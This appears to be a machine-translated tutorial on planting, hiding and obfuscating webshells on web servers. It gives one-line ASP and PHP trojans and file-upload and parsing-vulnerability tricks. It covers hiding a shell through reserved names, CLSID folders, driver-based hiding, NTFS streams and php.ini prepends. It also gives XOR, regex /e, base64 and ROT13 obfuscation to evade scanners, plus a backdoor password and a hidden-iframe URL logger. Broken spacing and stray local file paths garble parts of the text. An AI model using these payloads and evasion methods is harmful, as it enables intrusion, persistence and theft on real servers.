Webshell implementation and hiding

Webshell implementation and hiding
1. What is webshellwebshell introduction webshell? As the name suggests, web refers to the web server, while shell is a script program written in scripting language. webshell is a web management tool, the permission to operate on the web server, also known as webadmin. Webshell is generally used by website administrators for website management, server management, and other purposes. However, due to the powerful functions of webshell, you can upload and download files and view databases, attackers can even call commands related to the system on some servers (such as creating users and modifying and deleting files). These commands are usually used by hackers to upload files, upload your own webshell to the directory of the web Server Page, and then invade the web server through page access, alternatively, you can insert a sentence to connect to a local machine to directly intrude the server. Webshell classification webshell scripts can be divided into PHP script Trojan, ASP script Trojan, And. NET-based Script Trojan and JSP script Trojan. In foreign countries, there are also dynamic web pages written in python scripting language, of course, there are also related webshells. The functions are also divided into Trojan Horse and pony. Pony generally refers to a Trojan Horse. For example, <% eval request ("pass") %> usually writes this sentence into a document, then change the file name to xx. asp. Then upload it to the server. Here, the eval method converts a request ("pass") to code execution. The request function applies external files. This is equivalent to the client configuration of a Trojan. Server configuration (local configuration ):

<Form action = http: // host path/TEXT. asp method = post> <textarea name = value cols = 120 rows = 10 width = 45> set lP = server. createObject ("Adodb. stream ") // create a Stream object lP. open // Open lP. type = 2 // lP in text format. charSet = "gb2312" // font standard lP. writetext request ("newvalue") lP. saveToFile server. mappath ("newmm. asp "), 2 // write the trojan content into newmm by overwriting the file. asp, 2 is the covered method lP. close // Close the object set lP = nothing // release the object response. redirect "newmm. asp "// switch to newmm. asp </textarea> <textarea name = newvalue cols = 120 rows = 10 width = 45> (add the content of the generated Trojan) </textarea> <BR> <center> <br> <input type = submit value = submit>

 

Here, the trojan is submitted by submitting a form. The specific method is to define an object IP address and write the content in newvalue in text format (the content of newvalue is defined in textarea ), write to overwrite the ASP file and execute this script. The value in the client represents the form name, which must be the same as the form name in the post submission on the server (Local Machine). Therefore, the value here can be any character, it is equivalent to a password, but the 'Password' is in plain text and can be intercepted. The principle of one sentence in PHP is similar to the above principle, that is, the difference in language leads to different syntaxes. This is the basic working principle of pony. The working mode of dama is much simpler. There is no difference between the client and the server, that is, some script Daniel directly integrates the server with a single-sentence Trojan and uploads the Dama horse through the Upload Vulnerability, then, copy the url of the Trojan to directly access the web server and perform penetration on the page. However, some websites impose strict restrictions on File Upload. Because of the large number of functions of the Trojan Horse, the volume is relatively large and may exceed the website upload restrictions, however, the volume of the pony can be controlled (for example, the code can be copied many times, or the code can be inserted in a garbled file). However, the pony operation is cumbersome. You can upload the pony to get webshell first, then upload the Trojan horse to the server through the pony connection. Ii. How to upload webshell1. the resolution vulnerability upload now has different web server programs for different web server systems, iis for windows, and nginx for linux. These services provide a great deal of help for Building web servers. They also pose potential risks to servers. These servers have some vulnerabilities that can be easily exploited by hackers. (1) iis Directory parsing vulnerabilities such as:/xx. although asp/xx.jpg uploads a JPG file, if the file is in xx. under the asp folder, the iis will treat this image file as xx. asp parsing. This vulnerability exists in iis5.x/6.0. (2) File Parsing Vulnerability: xx.asp;.jpg. When a webpage is uploaded, it identifies a jpg file, but the iis does not parse it after the upload. The subsequent characters will also parse the file into an asp file, this vulnerability exists in iis5.x/6.0. (3) file name resolution, for example, xx. cer/xx. cdx/xx. asa. In iis6.0, cer files, cdx files, and asa files will all be treated as executable files, and asp code in them will also be executed. (The asa file is a configuration file specific to asp, and cer is the certificate file ). (4) When fast-cgiis enabled on the webserver, upload the image xx.jpg. Content: <? Php fputs (fopen ('Shell. php', 'w'), '<? Php eval ($ _ POST [shell])?> ');?> Use fput to create a shell. php file and write a sentence. Xx.jpg/. php, a Trojan shell. php will be generated in this path. This vulnerability exists in IIS 7.0/7.5 and Nginx 8.03 or earlier versions. Language Environment: PHP, prel, Bourne Shell, C, and other languages. * Note: fast-CGI is an upgraded CGI version. CGI refers to the interface that provides human-computer interaction on the server. fast-CGI is a resident CGI. Each time CGI is executed, it needs to use fork to enable a process. However, fast-CGI is always executed after being activated and does not need to fork a process for each request. It accounts for less memory than common CGI. (5) apache Parsing Vulnerability ghost. Because apache cannot parse rar, It is parsed as php, but the background upload point is parsed as rar, in this way, the file suffix limit is bypassed. 2. when you upload an image, such as 1.asp. jpg (there is a space behind asp). During the upload, capture the form with NC or burpsuite and add % 00 to the asp file. (You can directly edit the HEX Value in the burpsuite, the HEX value of space is 20, and 20 is changed to 00). If HEX is 00, it indicates truncation, and 20 indicates space. If it indicates truncation, it indicates that the JPG verification statement in the script is ignored, upload ASP directly. 3. back-end database backup is used in some enterprise background management systems. One function is to back up the database (for example, the backup database function is available in the southern cms ). You can upload an image that contains a Trojan horse, or change the Trojan horse to jpg format, and then use the database backup function, back up this image as asp and other content that can be parsed into the script statement format, and then run the trojan through web access, but this method is very old, most cms has canceled or disabled the backup function. 4. using Database statements to upload (1) the premise of using the mysql database into outfile method must be that the website has a corresponding injection point, and the current user must have the upload permission, it must also have the absolute path of the current webpage under the server. The method is to use a joint query to import a Trojan horse into a PHP file under the website, and then connect to the website using the server. However, the above method is too harsh and rarely encountered. (2) create a new table write Trojan some open source cms or self-made webshell will have the database management function, in the database management function contains the SQL query function, first use create table shell (codetext ); create a table named shell. The table lists the code and the type is text. Then, USE insert into shell (code) values ('one-sentence marat'). Here, the code column in the shell table is assigned as a one-sentence Trojan, and then use custom backup, back up the table to x. php; x is then parsed into php and executed. Here is not x. php; x will be able to be parsed to php. Different web servers have different service programs and filter rules. Other methods may be used. (3) phpMyadmin setting error phpMyadmin is a tool used to manage website databases, where config. inc. php configures the file. When you view the file, if the value of $ cfg ['servers'] [$ I] ['auth _ type'] is not set, the default value is config) it indicates that no verification is performed when you log on to the database. You can directly connect to the database. In Mysql versions, the root user is used to log on to the database by default (that is, the Administrator ), therefore, login is the maximum permission. However, the root user can only log on locally, so a remote login user must be created. After logging on to the user remotely, create a table and write a trojan in one sentence. 3. "security" of webshell 1. Hiding webshell must be hidden when uploading webshell. Hide webshell. The first objective is to prevent the website administrator from deleting the trojan. The second objective is not to be discovered and used by other hackers. (1) Hidden Trojan ① names of folders retained by the system exist in the zombie windows system. These names cannot be used in windows to name folder retained folders: aux | prn | con | nul | com1 | com2 | com3 | com4 | com5 | com6 | com7 | com8 | com9 | lpt1 | lpt2 | lpt3 | lpt4 | lpt5 | lpt6 | lpt7 | lpt8 | lpt. However, these can be created using the copy command of windows, such as: c: \> copy 3.asp \. \ C: \ aux. asp file:///C : \ Users \ SAKAIY ~ 1 \ AppData \ Local \ Temp \ msohtmlclip11 \ clip_image020.png file:///C : \ Users \ SAKAIY ~ 1 \ AppData \ Local \ Temp \ msohtmlclip11 \ clip_image022.jpg create an aux. asp in drive C. This file cannot be deleted on the image interface. file:///C : \ Users \ SAKAIY ~ 1 \ AppData \ Local \ Temp \ msohtmlclip11 \ clip_image023.png the del command must be used to delete the image. file:///C : \ Users \ SAKAIY ~ 1 \ AppData \ Local \ Temp \ msohtmlclip11 \ clip_image024.png is not prompted after deletion, but the file does not exist. Of course, this method can be used to create a webshell that cannot be deleted on the GUI. However, if the webshell is directly stored in the root directory of the web page, it is still deleted by experienced network administrators. ② Clsid hide windows every program has a clsid. If you name a folder x. {program clsid}, enter the following two commands: file:///C : \ Users \ SAKAIY ~ 1 \ AppData \ Local \ Temp \ msohtmlclip11 \ clip_image026.jpg after creation file:///C : \ Users \ SAKAIY ~ 1 \ AppData \ Local \ Temp \ msohtmlclip11 \ clip_image027.png click to open the control panel, but the file is still a folder, and there is a trojan in it, in addition, creating a folder with clsid and naming it as a corresponding program can confuse the implementation of the network administrator. For example, you can create a folder with the recycle bin clsid in the recycle bin folder, copy a reserved word asp in it, and you can use attrib + h + s + r + d/s/d to modify the attributes of the file and hide it, generally, hidden files are not displayed in windows by default, and the recycle bin folder is automatically created to hide an undead webshell to the server. ③ The principle of driver hiding is that, in a windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function, which can allocate a buffer, store the information obtained from the subfolders traversal in this folder to the buffer. During the traversal, find the matching file name. If the file name matches, the current folder or file will be bypassed, for the principle of bypassing, I queried the Code. According to my understanding, it is based on the offset of the file when the traversal pointer is queried to the target file, skip this step without scanning the target folder. For the implementation of this technology, although there are a lot of C source code on the Internet, it is difficult to operate, because of the support of header files and system support (different system file systems will be different ), find the Easy File Locker program on the Internet and install it on the web server to set permissions for the target File. file:///C : \ Users \ SAKAIY ~ 1 \ AppData \ Local \ Temp \ msohtmlclip11 \ clip_image028.png permission settings are readable accessable, writable, and deletable, visible. file:///C : \ Users \ SAKAIY ~ 1 \ AppData \ Local \ Temp \ msohtmlclip11 \ clip_image030.jpg you can see that we have hidden it. As mentioned above, because we directly bypass traversal, we can access the absolute path. My understanding is: c: \ WINDOWS \ xlkfs. datc: \ WINDOWS \ xlkfs. dllc: \ WINDOWS \ xlkfs. inic: \ WINDOWS \ system32 \ drivers \ xlkfs. the four files in sys Replace the traversal query. To access the hidden files, the input absolute path is not an application absolute path query, but is queried through the above four files, it is equivalent to a separate driver for hidden files. In order not to be discovered by the Administrator, you can delete the Easy FileLocker program, but not the above four files. After the program is deleted, you can enter the absolute path or access it to hide the backdoor. ④ the Registry hides the Registry path: HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ explorer \ Advanced \ Folder \ Hidden \ SHOWALL has a CheckedValue in this path and changes it to 0, if there is no CheckValue, this key is directly created, and it is assigned 0, and the created hidden file is completely hidden, "Show All Files" cannot be displayed in the folder option instantly. (2) one-sentence Trojan hiding ① the header file contains some script files hidden in the web. Some files contain statements, which can be used to include one-sentence files, these statements are called directly when you access this page. Asp statement: <! -# Export defile = "file path"->. Enter the path directly. The file path is the path on the web server. You can use the webmaster to stop writing the NTFS streaming pony into the image, and change the path '\' to ':'. The image cannot be displayed after it is written, find an asp file on the web server and write the include statement at the beginning of the file. <! -# Includefile = "inc: 1.jpg"->. File Inclusion can be resolved to the NTFS stream as asp. After the inclusion, the asp file we access contains a sentence, which hides a sentence. Php statement: <? Php include ($ include);?> $ Include can be an external path, for example: http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php The content of 1. php on aaa is <? Php include ($ include);?>, Contains. Bbb is an external server, provided that this server does not support PHP. Otherwise, hehe. php (a sentence horse) will be executed on the bbb server, but aaa will not be executed. ② The configuration file hides a sentence (PHP). After obtaining the PHP webshell, you can use php. ini hides the file and edits the configuration file. One of the items is to add the content of a file to the header and footer of any interface: auto_prepend_file = hehe. php then look at include_path = "E: \ PHPnow-1.5.6 \ htdocs;" this configuration information indicates the position of the collection to load the header and footer, the path rule is "\ path1; \ path2 ″, add the header and footer file under the folder in the path1 path to the file in the path, because it is '. 'indicates the root path, which is added to the home page, and then hehe. in the asp file, you can add a header in php and write a sentence to the homepage of the website. ③ When visiting 404 pony 404, pony showed a page that does not exist on the 404 page, but in fact the trojan code has been executed. Generally, it can be called by shift five times. 4. About webshell kill-free one-sentence kill-free 1. constructor bypasses detection (PHP). General detection programs will filter such characters as "_ POST", "system", and "call_user_func_array, in this case, we can use the constructor to bypass some moderation programs. The basic principle is that every character in php corresponds to a binary value, which can be in an exclusive or way, replace a character in the horse with two different or later values. For example

<? Php @ $ _ ++; // here + + Let '_' Add 1 $ __= ("#" ^ "| "); // _ $ __= (". "^ "~ "); // P $ __= ("/"^" '"); // O $ __= (" | "^ "/"); // S $ __= ("{" ^ "/"); // T?>

Then the constructor and a sentence can be written as <? Php @ $ _ ++; $ __= ("#" ^ "|"). ("." ^ "~ "). ("/" ^ "'"). ("|" ^ "/"). ("{" ^ "/"); // $ __The value is _ POST $ {$ __}[! $ _] ($ {__} [$ _]);?> // The result is @ $ _ POST [0] ($ POST [1]). $ _ Indicates the opposite of 1. In the language, 1 indicates true, and in turn 0 (false). However, this bypass method is quite weak. Think carefully, even if the binary values of two characters are different or different, we must use a specific character to apply the value of that character, for example, $ __= ("#" ^ "| "). (". "^ "~ "). ("/" ^ "'"). ("|" ^ "/"). ("{" ^ "/") The binary value is the same as the value of the _ POST character. If the detection program detects the value of the binary code, it will still be killed. 2. The regular expression substitution method (PHP) php has a function preg_replace (), which can be used to replace regular expressions. Replacing the bypass detection system also requires a function feature in the php script language. When a function is called, if the value of the form parameter in the function contains a command, the system will execute the command. <? Phpfunction funfunc ($ str) {} echopreg_replace ("/<title> (. + ?) <\/Title>/ies ", 'funfunc (" \ 1 ") ', $ _ POST [" cmd "]);?> The above code is an alternative process. First, create an empty function, and then use the preg_replace function to replace <title> </title> (in html) in the cmd form with funfunc, write the value in the post form as <title >{$ {phpinfo () }</title> (of course, phpinfo () can be replaced with other commands, it will become funfunc ({$ {phpinfo ()}). Because $ {} can parse the content in {}, the phpinfo here can be executed smoothly. 3. the instant generation method (PHP) is easy to scan by the scanner when the header file contains the header file. In this case, you can use file_put_content to create a file and write a sentence like php. Before the access, Mr Cheng Ma, but this function is sensitive and can be easily killed. 4. avoidance Method (asp) because some asp servers filter <%, %> to prevent a sentence of horse, you can use: <scriptlanguage = VBScriptrunat = server> execute request ("cmd ") </Script> functions are the same. Avoid specific scripting language: aspx sentence <script language = "C #" runat = "server"> WebAdmin2Y. x. y aaaaa = new WebAdmin2Y. x. y ("add6bb58e139be10"); </script> use C # To write a sentence. 5. asp splits <% eval request ("x") %> into <% Y = request ("x") %> <% eval (Y) %>, although the possibility of bypassing is very small, it is also a method of bypassing. Some servers may have done a lot of scanning methods on the tall, but minor problems are missing. Enhanced split method: <% IfRequest ("MH") <> "" Then Execute (Request ("MH") %> <% if request ("MH ") <> "" thensession ("MH") = request ("MH"): end if: ifsession ("MH") <> "" then executesession ("MH ") %> the above two sentences use if to separate them. The central idea is to split sensitive characters, because the asp signature is usually eval (request or execute (request, if no signature is detected after splitting, It is bypassed directly. 6. garbled deformation (ANSI-> Unicode encryption) <% eval request ("#") %> changed to "dynamic regression" eval (chr (114) + chr (101) + chr (113) + chr (117) + chr (101) + chr (115) + chr (116) ("brute") % & gt; the preceding line of code uses the ascii encryption method. chr (114) represents the 114 character in ascii, that is, r. The converted code is <% eval (request ("brute") %> 7. kill-free daemon (1) base4code-encoded daemon kill. You can compress the daemon code and compress it before performing the base4 encryption algorithm, then add @ eval (gzinflate (base64_decode ($ code) at the end of the Trojan to execute the script. Among them, the $ code variable is used to store the base4 code. During execution, gzinflate is extracted and executed in eval. In fact, this is not really a kill-free solution. We think base4code and eval are still included in the ranks of signatures and will also be killed when the scanner is used. (2) ROT13 encoding (php) str_rot13 is a function used by php for encoding. It can be used to encode script code to bypass pattern detection, for example. file:///C : \ Users \ SAKAIY ~ The strrev function in the 1 \ AppData \ Local \ Temp \ msohtmlclip11 \ clip_image031.png image is used to reverse the character. to escape the signature detection, separate the characters with the '.' sign. In the figure, the three characters encrypted by str_rot13 are gzinflate, str_rot13, and base64_decode, which is equivalent to triple encryption and avoids gzinflate and base64_decode. However, str_rot13 is not avoided. Some programs may use str_rot13 as the signature. ROT13 turns to 13, which indicates that the current character's position value in the alphabet minus the character value corresponding to 13 is encrypted. The data is encrypted twice and then returned to the original value. However, due to the fixed algorithm, the encryption intensity is not strong. In addition, the method of cracking is extremely simple. You only need to encrypt it. (3) other codes are used to determine whether a virus exists. When a trojan or pony is killed in one sentence, generally, encryption functions in php or asp scripts are used to encrypt and bypass scanners (such as base4 and rot13), but I think I can write the encryption algorithm myself, then, you can use your own encryption algorithm to encrypt the script code to bypass some signatures. You can use some encryption methods such as the Caesar password and shift encryption to write an encryption algorithm, encrypt the script code, and then the pattern like base4 and rot3 will disappear, alternatively, you can use a self-made encryption algorithm to encrypt the signature and then use it to decrypt it. You can also use key encryption algorithms such as DES and RSA. Generally, there will be a password login box for the Trojan horse. The password of the login script can be linked with the decryption key, after you enter the correct password, you can resolve the problem. On the one hand, this trojan cannot be decrypted even if it is obtained by someone else, in order to avoid scanning and killing the scanner and software. On the other hand, this trojan cannot be decrypted, see the source code. 5. webshell backdoors generally have webshells for Trojan Horses downloaded from the Internet. These webshells directly cause the websites we use to be taken away by others, therefore, the trojan downloaded from the Internet must first check whether there is a backdoor. For example, the universal password here:

end functionif session("hehe")<>userpassthenifrequest.form("pass")<>"" thenif request.form("pass")=userpassor request.form("pass")="1111111" Thensession("hehe")=userpasssresponse.redirect urlelse

 

Request. form ("pass") = userpass was originally used to verify the pass value. If the input pass value is equal to userpass, it indicates that the verification is successful, but the subsequent request is orrequest. from ("pass") = "1111111" indicates that if the input pass value is 1111111, you can log on to the Trojan. Of course, this place cannot be so simple. The original author can assign two values to userpass and add a trigger condition for userpass change, this condition is triggered when a user logs on (for example, if the logon fails, the userpass value is updated). In this way, you can add a backend, in addition, the Code of the trigger condition is separated from the verification code, which is difficult to find. In this case, we need to analyze the trojan code line by line. Then use the frame to mount the trojan: <iframe src = backdoor address width = 0 height = 0> </iframe> set the link width and height to 0, the page is hidden. The "webshell address" points to the script receiver, and finally puts the email receiving script on a self-built public network server. The email receiving script is as follows:

<%url=Request.ServerVariables("HTTP_Referer")　　set fs=server.CreateObject("Scripting.FileSystemObject")　　set file=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)　　file.writeline url　　file.close　　set file=nothing　　set fs=nothing%>

 

Url = Request. ServerVariables ("HTTP_Referer" refers to the internal content of the Request, that is, the original url address, and then save the url address to hehe.txt in the current directory. To propose such a backdoor, you must first destroy the Trojan's second password for verification, that is, the universal password. Delete the relevant function code, and then find out if there is any hidden url such as width = 0 height = 0 on the asp Trojan page, and find and delete it.